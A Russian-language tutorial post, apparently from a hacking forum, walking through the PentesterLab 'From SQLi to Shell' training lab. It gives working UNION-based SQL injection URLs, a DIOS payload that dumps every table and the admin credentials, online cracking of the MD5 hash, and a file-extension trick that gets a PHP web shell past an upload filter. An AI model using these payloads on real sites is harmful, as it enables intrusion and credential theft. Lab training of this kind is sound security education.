Тем кто в теме врятли что то новое увидет здесь.Поэтому гамнокритика мне не нужна в коментах.Хотите срать - срите в отведенных для этого местах.
И так сегодня наша тема "От SQL иньекции до WebShell-а"
Будем учиться на тренировачной площадке - я скачал ее с
Код:
https://pentesterlab.com/exercises/from_sqli_to_shell
Для видео ее будет достотачно.
И так начнем.
Первое что нам нужно найти уязвимый параметр.В нашем случае это параметр id.
Код:
http://192.168.8.131/cat.php?id=1'
Теперь пробуем сбалансировать запрос:
Код:
http://192.168.8.131/cat.php?id=1-- -
Ищем количество столбцов:
Находим:
Код:
http://192.168.8.131/cat.php?id=1 order by 4-- -
Ищем уязвимые столбцы:
Код:
http://192.168.8.131/cat.php?id=.1 union select 1,2,3,4 -- -
Проверимь базу,версию,
Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(database(),0x20,version()),3,4-- -
Ищем админку:
Нашли
Код:
http://192.168.8.131/admin
Будем пробовать получить доступ к админке...
Пробуем разкрутить скуль и получить login pass админа.
Для экономии времени я буду юзать DIOS (Dump In One Shot) c помощью которого можно быстро получить список всех таблиц в один запрос:
Код:
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3a,table_schema,0x3c6c693e,table_name,column_name)),@)
И так наш запрос будет следующим:
Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3a,table_schema,0x3c6c693e,table_name,column_name)),@)),3,4-- -
Ищем таблицу с юзерами...
таблица: users , колонки: login и password
получим даные с этих столбцов:
Код:
http://192.168.8.131/cat.php?id=.1 union select 1,concat(make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3a,login,0x203a3a3a20,password)),@)),3,4-- -
Получили логин:admin и пароль в хэше:8efe310f9ab3efeae8d410a8e0166eb2
Первым делом идем на первый онлайн сервис по расшифровки хэша:
В моем случае это:
Код:
http://hashkiller.co.uk/md5-decrypter.aspx
пробуем расшифровать наш хэш:
Нам повезло)) Пароль расшифрован)
Пароль4ssw0rd
Итак идем в админку.
Зашли и ищем там страницу для загрузки контента(картники,новости, узыку и т.д...)
Код:
http://192.168.8.131/admin/new.php
ПРобуем загрузить наш шелл...
Говорит NO PHP! (((
Ну ничего,есть много способов обхода этого фильтра.Сейчас я о них рассказивать не буду - для этого я поже сниму отдельное видео по этой теме..
Для обхода этого фильтра в нашей ситуации достаточно переименовать наш shell.php в shell.php3 или shell.php4 или shell.php5
И так пробуем:
Ура мы залились)
Всем спасибо )) С вами был Mister_Bert0ni)